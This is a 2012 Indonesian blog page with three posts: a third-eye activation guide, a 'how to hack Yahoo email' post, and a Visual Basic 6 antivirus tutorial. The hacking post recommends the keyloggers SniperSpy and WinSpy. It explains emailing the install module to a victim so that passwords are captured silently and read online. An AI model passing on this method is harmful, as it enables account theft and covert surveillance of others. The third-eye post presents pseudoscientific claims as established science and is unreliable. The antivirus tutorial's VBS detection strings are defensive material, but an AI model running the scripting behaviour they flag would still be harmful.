Warung Bebas

Wednesday, August 22, 2012

Aktivasi Mata Ketiga Gratis…Tis… ::Enaknya Download Gratis::

NAQS DNA INSITUTE, Mata ketiga diasosiasikan dengan chakra Ajna yang terletak pada kening, sedikit diatas pertengahan kedua alis mata. Ajna juga dekat asosiasinya dengan kelenjar pineal/pineal gland yang sering disebut sebagai mata ketiga yang sebenarnya.
Filosofer perancis Rene Descartes mempercayai bahwa pineal gland ini merupakan “the Seat of the soul” (tempat duduknya jiwa) dimana koneksi pikiran dan tubuh dapat bertemu.
Kelenjar yang berukuran sebesar biji kacang ini biasanya tidak/kurang aktif bagi majoritas orang tetapi latihan di bawah nanti bila dilakukan dengan benar akan dapat membangunkan dan menstimulasinya sehingga menjadi lebih aktif.
Fungsi Mata ketiga:
  • melihat energi
  • melihat alam halus/dimensi yang lebih tinggi
  • melihat tembus pandang
  • Pusat Intuisi
Setelah terbuka, mata ketiga mulai mengalami pertumbuhan hingga mencapai sempurna. Kecepatan pertumbuhan itu sendiri pada masing – masing orang tidak sama. Banyak faktor yang mempengaruhinya.
Ilmuwan “Menemukan Kembali” Mata Ketiga
Pentingnya mata ketiga yang dikenal juga sebagai mata kebijaksanan, telah diketahui oleh para pencari Kebenaran dan praktisi rohani selama berabad-abad, namun baru-baru ini keberadaannya baru diakui oleh ilmu pengetahuan modern. Sebagai contoh, dalam sebuah penelitian yang dilakukan oleh orang Rusia baru-baru ini, negatif (film) yang diletakkan di dalam sebuah amplop yang tidak tembus cahaya mulai berkembang menjadi gambar foto setelah diletakkan di atas dahi seseorang. Menurut peneliti utama riset ini, Vitaly Pravdivstev, “Pengujian ini mengungkapkan bahwa orang-orang tertentu sanggup memancarkan apa yang disebut “gambaran otak” dari suatu tempat di dalam dahi.”
Pravdivstev terus menunjukkan hubungan antara kemampuan ini dengan pusat otak yang dikenal sebagai mata ketiga. Ia menyatakan, “Tradisi orang Asia kuno dapat membuktikan perkiraan kita: Mereka mengatakan bahwa radiasi datang dari pusat energi manusia. Ilmu pengetahuan esoterik menyebut pusat ini sebagai mata ketiga.”
Demikian juga, keberadaan mata ketiga pada hewan-hewan tertentu telah dibuktikan di bidang zoologi. Banyak reptil dan burung memiliki mata ketiga yang berhubungan dengan kelenjar pineal. Mata ini tidak melihat dengan cara yang sama seperti mata fisik, tetapi mata ini dapat merasakan cahaya dan panas. Selain itu, kelenjar pineal manusia telah terbukti memiliki penerima cahaya dan memproduksi melatonin, suatu zat yang pelepasannya ditentukan oleh sejumlah cahaya yang diterima tubuh (lihat majalah Berita # 133,“The Pineal Gland and Melatonin (Kelenjar Pineal dan Melatonin)”.
Namun, ilmuwan umumnya meremehkan pentingnya fungsi kelenjar pineal dalam tubuh manusia. Meskipun sama dengan mata ketiga dari hewan-hewan tertentu, manusia tidak menggunakan kelenjar tersebut untuk merasakan cahaya secara langsung. Penemuan baru-baru ini menunjukkan bahwa mata fisik juga dapat memproduksi melatonin sehingga membuat peran kelenjar pineal semakin diabaikan. Akhirnya, tidak seperti pada hewan, mata ketiga manusia terpendam di dalam otak dan perbedaan tempat ini dapat membuat keberadaan kelenjar pineal manusia bahkan semakin kurang penting. Dalam istilah evolusi, kelenjar tersebut kelihatannya lambat laun menghilang daripada digunakan untuk fungsi vital.
Namun, penemuan yang dilakukan oleh Vitaly Pravdivstev yang dibahas di atas mungkin mendorong ilmu pengetahuan modern untuk menerima pandangan baru pada topik tersebut. Kemampuan untuk memproyeksikan gambar di foto telah menunjukkan bahwa organ ini sebenarnya dapat “melihat” sendiri dan bekerja melampaui tingkat keberadaan fisik. Kebanyakan dari mata ketiga mungkin berada dalam keadaan yang tidak aktif. Alasannya mungkin berbeda dengan apa yang diungkapkan oleh ilmu pengetahuan. Kelenjar pineal mungkin hanya butuh semacam pembangkitan yang Guru sebut sebagai “berhubungan kembali dengan Tuhan“ untuk mendapatkan perannya yang benar.
Pengarang lain, G de Puruker, seorang teosofis, pada tahun 1920 menulis tentang kelenjar pineal dan evolusi manusia dilihat dari sudut pandang rohani:
Bahkan saat ini, kelenjar pineal merupakan sumber dari kesadaran intuisi. Pada saat kita mempunyai firasat, kelenjar ini bergetar dengan perlahan; ketika kita mempunyai inspirasi atau kilasan pemahaman intuisi, ia bergetar lebih keras. Namun demikian, mata kebijaksanaan sangat sulit digunakan, terutama karena bekerjanya kedua mata fisik kita yang menghambatnya. Seiring dengan berlalunya waktu, kedua mata akan tumbuh dengan perlahan dan bekerja semakin sempurna, namun perannya nanti akan berkurang, dan “mata pertama“ akan kembali berperan sebagaimana mestinya.
Mungkin keterangan Puruker tentang “mata pertama“ dapat menjadi tanda penting untuk mengenali Zaman Keemasan. Jika demikian, penelitian Pravdivstev dapat melambangkan pengesahan ilmu pengetahuan tentang pentingnya mata kebijaksanaan. Seperti yang dikatakan Guru, mata kebijaksanaan adalah titik dimana kita “pergi“ berhubungan kembali dengan Tuhan di dalam. Pada dasawarsa mendatang, kita semua harus lebih menghargai pentingnya hubungan kita dengan Tuhan. [MK3]
Aktivasi Mata Ketiga
Bukan cuma ring back tone aja yang perlu diaktifkan, tapi mata ketiga kita juga sangat perlu di aktifkan. Semua orang tanpa kecuali punya mata ketiga. Sayangkan kalo nggak di pakai. Gunanya apa ? Sama seperti fungsi mata pada umumnya. Tapi mata yang ini untuk “melihat” hal-hal yang nggak bisa dilihat mata biasa. Gaib gitu ? Ini nggak melulu soal mistik tapi berguna untuk memperbaiki kualitas hidup kita secara global.
Mau tau cara mengaktifkannya? Yang pasti bukan dengan cara kirim sms ke operator hape. he..he..he…
Mata ketiga sendiri seperti fungsi utama mata memang di pergunakan untuk “melihat”.
Hanya hal-hal yang dilihat adalah kasat mata, yang nggak bisa dilihat mata biasa.
Mata biasa mempunyai kemampuan yang terbatas. Hanya bisa melihat bentuk-bentuk dalam dimensi tiga. Benda-benda yang bergetar pada frekwensi rendah. Sedangkan banyak benda-benda atau makhluk (entitas) yang bergetar pada frekwensi yang sangat cepat yang nggak bisa dilihat mata. Biasanya bagi yang terbiasa berpikir memakai logika saja apa yang bisa di lihat itulah yang di anggap kenyataan. Padahal justru hal-hal yang nggak bisa dilihat mempunyai energi lebih besar dan lebih besar pengaruhnya dalam hidup kita.
Contoh mudahnya adalah dengan memperhatikan baling-baling kipas angin. saat baling-balingnya berputar dengan kecepatan rendah kita masih bisa melihatnya. Tapi energi kinetik (angin) yang dihasilkan nggak besar. Lalu saat kecepatan berputarnya ditambah,baling-baling itu seolah menghilang tak terlihat. Tapi energi yang dihasilkan jauh lebih besar. Begitu juga fenomena yang ada di alam. Semua yang bergetar lebih cepat akan sulit terlihat tapi menghasilakan energi yang lebih besar.
Mungkin yang terlihat oleh mata ketiga bukan secara gamblang. Tapi melalui simbol-simbol. Atau lewat mimpi, firasat, intuisi, kejadian-kejadian atau situasi tertentu. Tapi bagi yang sudah terbiasa, hal-hal tersebut bisa ditangkap, diartikan sehingga bisa dipergunakan untuk mengambil keputusan yang tepat atau menghindari bahaya yang akan datang.
Secara medis kelenjar Pituitary juga mempunyai fungsi lain yaitu memproduksi HGH (human growth hormone). Yaitu hormon pertumbuhan dalam tubuh manusia yang diantaranya bertugas untuk membuat tulang lebih kuat,menumbuhkan rambut,merangsang kekebalan tubuh,memperbaiki daya penglihatan,memberikan perasaan nyaman, memperbaiki daya ingat. Dan yang paling penting buat para cewek khususnya, HGH ini bisa membuat kulit lebih halus,sehat dan awet muda.
Nah sekarang saatnya mengaktifkan mata ketiga dan kelenjar pituitary kita. Latihannya sebagai berikut:
  1. Duduk atau bersila nyaman pada asana anda dengan punggung tegak, tenangkan pikiran dan badan dengan baik sebelum menuju ke langkah selanjutnya.
  2. Dengan kedua tangan di letakkan pada paha dan posisinya terbuka menghadap keatas. Atau bagi yang nyaman duduk bersimpuh juga nggak masalah. Posisi tulang punggung harus tegak. Pundak dibuat rileks. Bernafaslah dengan rileks.
  3. Selanjutnya dalam imajinasi kamu, tentukan satu titik diantara kedua alis mata.
  4. Bila sudah berhasil “melihat” titik itu sekarang masih dalam imajinasi kamu “bernafaslah” melalui titik itu. Maksudnya seolah-olah kamu menarik dan menghembuskan nafas melalui titik itu dan bukannya melalui hidung. 
  5. Pertahankan gambaran ini selama mungkin. Bila pikiran kita melantur atau tiba-tiba masuk gambaran pikiran lain. Perlahan-lahan secara lembut kembalikan lagi ke gambaran awal yaitu bernafas melalui titik tersebut. Hal tersebut merupakan hal yang normal jadi nggak perlu khawatir.
Biasanya sensasi-sensasi yang dirasakan adalah denyutan yang cukup keras atau adanya rasa hangat pada titik tersebut. Sensasi yang dirasakan setiap orang akan berbeda-beda. Tidak hal yang baku dalam masalah ini. Bagi yang tidak atau belum merasakan apapun nggak usah kecewa. Karena ini cuma masalah kepekaan individu.
Semakin sering latihan ini dilakukan akan semakin menambah kepekaan dan yang terpenting menstimulasi kelenjar pituitary dan mata ketiga kita. Hingga bisa berfungsi maksimal. Tidak ada aturan waktu yang baku kapan harus dilakukan. Bisa dilakukan kapan saja. Hanya memang baiknya dilakukan di tempat tertutup agar tidak terganggu orang lain.
Setelah sekitar 10-20 menit melakukan latihan, bisa ditutup dengan doa menurut kepercayaan masing-masing.
Efek samping yang diketahui:
Kemungkinan sakit kepala, migraine, panas dingin, sakit ringan yang disebabkan oleh proses adaptasi energi tubuh terhadap pola energi baru. Efek ini dapat terjadi dan juga tidak sama sekali tergantung dari tingkat keaktifan pineal gland anda. Bila terjadi efek samping biasanya hanya akan terasa berlangsung selama hanya berapa waktu, sejam, sehari atau dua hari. Bila berkelanjutan lebih dari 5 hari – seminggu maka dibutuhkan bantuan meditasi untuk menstabilkan arus energi chi tubuh.
Faktor yang menghambat terbuka dan berfungsinya mata ketiga:
  1. Hambatan mental
  2. Trauma
  3. Aura keinginan yang terlalu kuat melihat untuk menggunakan mata ketiga. Oleh karena itu jangan gunakan ambisi atau memaksakan diri yang bisa berakibat terjadinya korslet di otak anda alias terjadi gangguan syaraf alias Gila, santai dan rileks saja. Yang penting niat dan latihan rutin.
Nb.
  1. Bagi yang menjalankan latihan di atas, Resiko ditanggung sendiri-sendiri ya…. Kalau mau dibimbing secara khusus, ya wajib datang ke tempat pelatihan. he..he…he….
  2. Soal mata ke-3, Intuisi, Indra ke-enam, dll. jadilah diri sendiri saja…. tidak usah membandingkan pencapaian diri sendiri dengan orang lain….. Gunakan metode yg paling pas untuk diri sendiri…. Karena apapun sinyal yang kita terima itu sifatnya pribadi…. bahasa simbolik yg disesuaikan dengan kosa kata dan belief system kita…..
  3. Jangan punya fantasi dan imajinasi yang berlebihan, terima saja apapun intuisi, firasat, dan sinyal yang anda terima. Melihat aura ataupun melihat makhluk halus semacam jin, dll. bukanlah satu-satunya pertanda keberhasilan anda. karena tiap orang potensi elemen atau unsur (Air, Api, Udara, & Tanah) di dalam dirinya tidak sama, jadi bagi yang dominan unsur Api mungkin hanya mampu merasakan dengan “RASA” dan baru melihat entitas energi melalui mimpi. Dan itupun artinya anda telah berhasil. Jadi jangan terjebak pada cerita keberhasilan orang lain yang hanya akan mengecilkan motivasi anda. Tetaplah berlatih memurnikan diri, berkultivasi. Dan Terimalah Anugerah yang anda terima dan syukurilah.
Tekhnologi Brainwave Aktivasi Mata Ketiga (PINEAL GLAND GOUP ACTIVATION)
listen with headphones (highly recommended):
http://www.4shared.com/embed/801770995/c816915d

Wednesday, August 8, 2012

Cara Hack Email Yahoo 2013::Enaknya Download Gratis::


Cara Hack Email Yahoo 2012 - Menggunakan keylogger adalah  Cara Hack Email Yahoo 2012  termudah untuk hack password Yahoo. keylogger adalah program kecil yang mencatat setiap keystroke(termasuk password) yang diketik pengguna pada keyboard komputer tertentu's. keylogger juga disebut sebagai program mata-mata atau perangkat lunak mata-mata. Untuk menggunakannya, Anda tidak perlu memiliki pengetahuan khusus. Siapapun yang memiliki pengetahuan dasar tentang komputer harus dapat menginstal dan menggunakan perangkat lunak ini. Dengan pengalaman saya, saya sarankan dua keyloggers berikut sebagai yang terbaik untuk hacking password Yahoo. 

1. SniperSpy (Tested) 

2. WinSpy (Tested) 

Saya tidak punya akses fisik ke komputer target, apakah saya masih dapat menggunakan SniperSpy? 
Ya, Anda bisa! Karena baik SniperSpy dan WinSpy menawarkan Fitur, adalah mungkin untuk jarak jauh menginstal keylogger pada komputer target. Namun, hal itu juga akan bekerja pada komputer lokal. 

Bagaimana menggunakan SniperSpy? 

1. Setelah Anda men-download, Anda akan dapat membuat modul instalasi. Anda perlu email modul ini ke remote user sebagai lampiran. 

2. Ketika remote user menjalankan modul ini, maka akan mendapatkan terinstal diam-diam dan proses pemantauan akan dimulai. Adalah tombol yang ditangkap dan upload ke server SniperSpy terus menerus. 

3. Anda dapat login ke rekening online SniperSpy Anda (Anda mendapatkan ini setelah pembelian) untuk melihat log yang berisi password. 

CATATAN: Jika Anda memiliki akses fisik ke komputer target, Anda dapat menginstal modul sendiri tanpa perlu ke email sebagai lampiran.

Tuesday, August 7, 2012

Membuat Antivirus dengan VB6::Enaknya Download Gratis::

langsung aja

dsni kita membuat antivirus dgn VB6

-> Teknik checksum
antivirus ini tidak menggunakan teknik scan menggunakan CRC32 melainkan menggunakan teknik READ BYTE langsung dari tubuh virus/worm nya

"Mengapa aye menerapkan teknik ini ?
tentu saja karena waktu scan akan lebih cepat daripada menggunakan CRC32,akurat pada saat pendeteksian & menghemat penggunaan string agar ukuran antivirus nya tidak terlalu besar

-> Fitur karantina file yang terdeteksi
"Dengan adanya fitur ini user tidak perlu takut file nya akan terhapus,karena dengan menggunakan fitur ini,file akan dikarantina oleh antivirus ke dalam suatu folder dan file yang terdeteksi tidak akan bisa di jalankan/di eksekusi"

-> Fitur Heuristic
"Heuristic dalam dunia antivirus berarti mendapatkan virus/worm baru"
pada antivirus ini akan diterapkan 2 teknik heuristic yaitu :

1. Heuristic Icon
Hampir rata-rata semua virus lokal menggunakan icon seperti icon Office word,winamp,Icon Folder yang bertujuan agar user awam mengklik file virus tersebut,
dengan teknik ini antivirus dapat melihat mana file virus yang menyamar dengan icon palsu atau file asli yang tidak terinfeksi virus

2. Heuristic VBS
Dengan teknik ini antivirus mampu membaca source dari file VBS yang biasa di pakai virus,
antivirus akan mencocokan source yang ada pada database dengan source yang terdapat pada virus,jika cocok maka akan langsung di anggap virus

Itu sedikit penjelasan tentang antivirus yang akan kita buat sekarang,
yuk langsung saja kita mulai membuat antivirus nya
aye akan berikan source code fullnya pada akhir postingan

-------------------------------------------
Author : Dias Taufik Rahman a.k.a mydisha
Compiller : Microsoft Visual Basic 6.0
Program Type : Antivirus
Source Code : Yes
-------------------------------------------

1.Buka program microsoft visual basic 6.0 -> Standard EXE -> OK
maka akan tampil form baru sesuai dengan gambar di bawah,desain form sesuai keinginan anda

Beri nama form tersebut : frmUtama

2.Setelah form selesai di rubah namanya tambahkan component Mscomctl.Ocx dengan cara
Klik Project -> Components -> Microsoft Windows Common Controls 6.0 -> lalu klik OK

3.Setelah component sukses di tambahkan langkah selanjutnya adalah menambah Command Button,Textbox,Listview,Picture Box
disini aye menggunakan desain yang sangat sederhana,desain bisa anda rubah sendiri sesuai kreatifitas anda ^^

- Tambahkan Listview kedalam form dan beri nama lvScan
yg da lingkaran merah adalah listview yang telah di tambahkan ke dalam form.

setelah itu setting listview dengan cara
Klik Listview -> Disebelah kanan bawah ada kotak properties -> Custom

Lalu pada tab Column Headers klik insert column
- Column 1 beri nama : Virus Name
- Column 2 beri nama : Path
- Column 3 beri nama : Checksum Virus
- Column 4 beri nama : Status Virus
lalu klik Ok

Tambahkan picture box buat picture box itu sekecil mungkin dan beri nama sIcon
Setting :
Appearance : Flat
Auto Redraw : True
Border Style : None
Visible : False

Tambahkan Textbox ke dalam form dengan nama txtPath
Setting :
Appearance : Flat
Border Style : None

Tambahkan Command Button dengan nama cmdBrowse di samping Textbox yang telah di buat tadi
Setting :
Caption : ...

Masukan Code ini ke dalam cmdBrowse

Dim Pathnya As String
Pathnya = ""
Pathnya = BrowseFolder("Pilih folder yang akan di Scan:", Me)
If Pathnya <> "" Then
txtPath.Text = Pathnya
End If

Code di atas berfungsi untuk membuka kotak dialog yang berisi path" yang ada di dalam komputer lalu mencetaknya ke dalam textbox yang bernama txtPath

Tambahkan label dengan nama default
Setting :
Caption : Dir Scanned

Tambahkan label dengan nama lblDirScan
Setting :
Caption : 0

Tambahkan label dengan nama default
Setting :
Caption : Detected

Tambahkan label dengan nama lblFileDet
Setting :
Caption : 0

Tambahkan label dengan nama default
Setting :
Caption : File Scanned

Tambahkan label dengan nama lblFileScan
Setting :
Caption : 0

Tambahkan Textbox dengan nama txtFileScan
Setting :
Multiline : True
Scroll Bar : 2-Vertical

Tambahkan Command Button dengan nama cmdScan
Setting :
Caption : &Scan

If cmdScan.Caption = "Scan" Then
Pathnya = txtPath.Text
If Mid(Pathnya, 2, 1) <> ":" Or Pathnya = "" Then
MsgBox "Direktori Tidak Ditemukan", vbCritical, "Error"
Exit Sub
Else
lvScan.Enabled = False
cmdEnable False, False, False
clear_log
cmdScan.Caption = "Stop"
StopScan = False
FindFilesEx txtPath.Text, CBool(chkSubDir.Value)
MsgBox "Scan finished !" & vbNewLine & vbNewLine & "Total Dir Scanned = " & lblDirScan.Caption & _
vbNewLine & "Total File Scanned = " & lblFileScan.Caption & vbNewLine & "Total File Detected = " & lblFileDet.Caption, vbInformation, "Finish"
If lblFileDet.Caption <> "0" Then
cmdEnable True, True, True
Else
cmdEnable False, False, True
End If
lvScan.Enabled = True
cmdScan.Caption = "Scan"
End If
Else
cmdScan.Caption = "Scan"
StopScan = True
End If
fungsi kode di atas adalah untuk memulai scan pada antivirus

Tambahkan Command Button dengan nama cmdAction
Setting :
Caption : &Delete

Tambahkan Command Button dengan nama cmdAction
Setting :
Caption : &Quarantine

Tambahkan Command Button dengan nama cmdViewQ
Setting :
Caption : &View Quarantine File

Tambahkan Command Button dengan nama cmdAction
Setting :
Caption : &Delete

Tambahkan kode ini di dalamnya

Dim DftrFile As String
DftrFile = GetSelected(lvScan)
If DftrFile = "" Then
MsgBox "No Detected File(s) Selected", vbCritical, ""
Exit Sub
End If
Select Case Index
Case 0
clean = Action(DftrFile, lvScan, "D")
MsgBox clean & " File(s) has been deleted"
Case 1
clean = Action(DftrFile, lvScan, "Q")
MsgBox clean & " File(s) has been quarantine"
End Select
Fungsi di atas adalah fungsi untuk menghapus/mengkarantina file yang terdeteksi

Tambahkan Command Button dengan nama cmdAction
Setting :
Caption : &Quarantine

Tambahkan Command Button dengan nama cmdViewQ
Setting :
Caption : &View Quarantine File

Lalu masukan code ini ke dalamnya

frmQuarantine.Show , Me
frmUtama.Enabled = False
Code di atas berfungsi untuk memunculkan form quarantine dan meng enabled form utama

nah selesai untuk memasukan control ke dalam formnya

lalu klik kanan pada form masukan kode di bawah ini

Private Sub lvScan_ItemCheck(ByVal Item As MSComctlLib.ListItem)
UnSelect lvScan, "Di Karantina"
UnSelect lvScan, "Di Hapus"
End Sub

Private Function cmdEnable(hapus As Boolean, Quarantine As Boolean, openQuarantine As Boolean)
cmdAction(0).Enabled = hapus
cmdAction(1).Enabled = Quarantine
cmdViewQ.Enabled = openQuarantine
End Function

Private Function clear_log()
lblDirScan.Caption = 0
lblFileScan.Caption = 0
lblFileDet.Caption = 0
lvScan.ListItems.Clear
jumlahDir = 0
jumlahFile = 0
jumlahVirus = 0
End Function


lalu di Form_load() masukan kode ini

On Error Resume Next
MkDir "Quarantine"
BuildDatabase

Lalu buatlah 1 module dengan nama modAPI

Lalu tambahkan code di bawah ini

Public Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
Public Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
Public Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long
Public Declare Function PathIsDirectory Lib "shlwapi.dll" Alias "PathIsDirectoryA" (ByVal pszPath As String) As Long
Public Declare Function CopyFile Lib "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Public Declare Function MoveFile Lib "kernel32.dll" Alias "MoveFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String) As Long
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
Public Declare Function PathFileExists Lib "shlwapi.dll" Alias "PathFileExistsA" (ByVal pszPath As String) As Long
Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Public Declare Function SHBrowseForFolder Lib "shell32.dll" Alias "SHBrowseForFolderA" (lpBrowseInfo As BROWSEINFO) As Long
Private Declare Function RealizePalette Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function GetFileSize Lib "kernel32" (ByVal hFile As Long, lpFileSizeHigh As Long) As Long
Public Declare Function VirtualAlloc Lib "kernel32" (lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Public Declare Function SetEndOfFile Lib "kernel32" (ByVal hFile As Long) As Long

Public Const GENERIC_READ = &H80000000
Public Const GENERIC_WRITE = &H40000000
Public Const FILE_SHARE_READ = &H1
Public Const OPEN_EXISTING = 3
Public Const FILE_ATTRIBUTE_NORMAL = &H80
Public Const INVALID_HANDLE_VALUE = -1
Public Const FILE_END = 2
Public Const FILE_BEGIN = 0
Public Const FILE_CURRENT = 1
Public Const LWA_COLORKEY = &H1
Public Const GWL_EXSTYLE = (-20)
Public Const WS_EX_LAYERED = &H80000
Public Const MAX_PATH = 260
Public Const SW_SHOWNORMAL = 1

Public Type FileTime
dwLowDateTime As Long
dwHighDateTime As Long
End Type

Public Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FileTime
ftLastAccessTime As FileTime
ftLastWriteTime As FileTime
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type

Type BROWSEINFO
hOwner As Long
pidlRoot As Long
pszDisplayName As String
lpszTitle As String
ulFlags As Long
lpfn As Long
lParam As Long
iImage As Long
End Type

'untuk browse folder
Public Function BrowseFolder(ByVal aTitle As String, ByVal aForm As Form) As String
Dim bInfo As BROWSEINFO
Dim rtn&, pidl&, path$, pos%
Dim BrowsePath As String
bInfo.hOwner = aForm.hWnd
bInfo.lpszTitle = aTitle
bInfo.ulFlags = &H1
pidl& = SHBrowseForFolder(bInfo)
path = Space(512)
t = SHGetPathFromIDList(ByVal pidl&, ByVal path)
pos% = InStr(path$, Chr$(0))
BrowseFolder = Left(path$, pos - 1)
If Right$(Browse, 1) = "\" Then
BrowseFolder = BrowseFolder
Else
BrowseFolder = BrowseFolder + "\"
End If
If Right(BrowseFolder, 2) = "\\" Then BrowseFolder = Left(BrowseFolder, Len(BrowseFolder) - 1)
If BrowseFolder = "\" Then BrowseFolder = ""
End Function

Public Function StripNulls(ByVal OriginalStr As String) As String
If (InStr(OriginalStr, Chr$(0)) > 0) Then
OriginalStr = Left$(OriginalStr, InStr(OriginalStr, Chr(0)) - 1)
End If
StripNulls = OriginalStr
End Function

'fungsi untuk menentukan file script atau bukan
Public Function IsScript(Filename As String) As Boolean
IsScript = False
ext = Split("|vbs|vbe", "|")
For i = 1 To UBound(ext)
If LCase(Right(Filename, 3)) = LCase(ext(i)) Then IsScript = True
Next
End Function

Code di atas adalah Fungsi API yang di butuhkan untuk antivirus

Buat 1 module dengan nama modChecksum
masukan code di bawah ini

Public Function GetChecksum(FilePath As String) As String
Dim CheckSum(1 To 2) As String
CheckSum(1) = CalcBinary(FilePath, 499, 4500)
CheckSum(2) = CalcBinary(FilePath, 499, 4000)
GetChecksum = CheckSum(1) & CheckSum(2)
End Function
Public Function CalcBinary(ByVal lpFileName As String, ByVal lpByteCount As Long, Optional ByVal StartByte As Long = 0) As String
On Error GoTo err
Dim Bin() As Byte
Dim ByteSum As Long
Dim i As Long
ReDim Bin(lpByteCount) As Byte
Open lpFileName For Binary As #1
If StartByte = 0 Then
Get #1, , Bin
Else
Get #1, StartByte, Bin
End If
Close #1
For i = 0 To lpByteCount
ByteSum = ByteSum + Bin(i) ^ 2
Next i
CalcBinary = Hex$(ByteSum)
Exit Function
err:
CalcBinary = "00"
End Function

potongan code di atas di gunakan untuk meng kalkulasi checksum


buat 1 module lagi dengan nama modDatabase
lalu tambahkan code di bawah ini

Code:
Public VirusDB(5), IconDB(48), Bahaya(5) As String
Public Sub BuildDatabase()
Call Checksum_DB
Call IconCompare_DB
Call Script_DB
End Sub
Private Sub Checksum_DB()
VirusDB(1) = "Alman.A|8911D290F723"
VirusDB(2) = "Malingsi.A|A6292EA60230"
VirusDB(3) = "Conficker.A|9EC112ABB2F3"
VirusDB(4) = "N4B3.A|B5CCD36CDB98"
VirusDB(5) = "N4B3.B|A1FE6D6DBE07"
End Sub
Public Sub IconCompare_DB()
On Error Resume Next
IconDB(1) = "20938B2"
IconDB(2) = "19F4ED6"
IconDB(3) = "133BE0B"
IconDB(4) = "18EDEAE"
IconDB(5) = "1EF89C2"
IconDB(6) = "1C915FF"
IconDB(7) = "24563C4"
IconDB(8) = "1B2DB74"
IconDB(9) = "208EA72"
IconDB(10) = "22A064D"
IconDB(11) = "19B64EE"
IconDB(12) = "1D4B7E1"
IconDB(13) = "2087762"
IconDB(14) = "29C7258"
IconDB(15) = "1B18705"
IconDB(16) = "1B5FCAB"
IconDB(17) = "126D4CF"
IconDB(18) = "1C58E5C"
IconDB(19) = "15D7730"
IconDB(20) = "1FB82B7"
IconDB(21) = "112763E"
IconDB(22) = "2165AF9"
IconDB(23) = "25F46BE"
IconDB(24) = "206556B"
IconDB(25) = "22A8D69"
IconDB(26) = "19237F8"
IconDB(27) = "15022B4"
IconDB(28) = "1D8B4EB"
IconDB(29) = "1DBC1EA"
IconDB(30) = "2333F5D"
IconDB(31) = "1F37C2F"
IconDB(32) = "1C9CCA4"
IconDB(33) = "1DFDFB4"
IconDB(34) = "1C1283E"
IconDB(35) = "1F6598C"
IconDB(36) = "27F4C1A"
IconDB(37) = "22F92E0"
IconDB(38) = "191DBDC"
IconDB(39) = "27BFE4A"
IconDB(40) = "20E0907"
IconDB(46) = "2FA4C88"
IconDB(47) = "25AA630"
IconDB(48) = "1DE28E2"
End Sub
Public Sub Script_DB()
On Error Resume Next
Bahaya(1) = "Scripting.FileSystemObject|Wscript.ScriptFullName|WScript.Shell|.regwrite|.copy"
Bahaya(2) = "Wscript.ScriptFullName|createobject|strreverse|.regwrite"
Bahaya(3) = "createobject|Wscript.ScriptFullName|.regwrite|[autorun]"
Bahaya(4) = "createobject|Wscript.ScriptFullName|specialfolder|.regwrite"
Bahaya(5) = "chr(asc(mid(|createobject|Wscript.ScriptFullName|.GetFolder|.RegWrite"
End Sub

potongan code di atas adalah database pada antivirusnya

buat lagi 1 buah module dengan nama modQuar
masukan code yang ada di bawah ini

Option Explicit
Public Function EncodeFile(SourceFile As String, DestFile As String)
Dim ByteArray() As Byte, Filenr As Integer
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr
Call Coder(ByteArray())
If (PathFileExists(DestFile)) <> 0 Then DeleteFile DestFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr
End Function
Public Function DecodeFile(SourceFile As String, DestFile As String)
Dim ByteArray() As Byte, Filenr As Integer
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr
Call DeCoder(ByteArray())
If (PathFileExists(DestFile)) <> 0 Then DeleteFile DestFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr
End Function
Private Sub Coder(ByteArray() As Byte)
Dim x As Long
Dim Value As Integer
Value = 0
For x = 0 To UBound(ByteArray)
Value = Value + ByteArray(x)
If Value > 255 Then Value = Value - 256
ByteArray(x) = Value
Next
End Sub
Private Sub DeCoder(ByteArray() As Byte)
Dim x As Long
Dim Value As Integer
Dim newValue As Integer
newValue = 0
For x = 0 To UBound(ByteArray)
Value = newValue
newValue = ByteArray(x)
Value = ByteArray(x) - Value
If Value < 0 Then Value = Value + 256
ByteArray(x) = Value
Next
End Sub

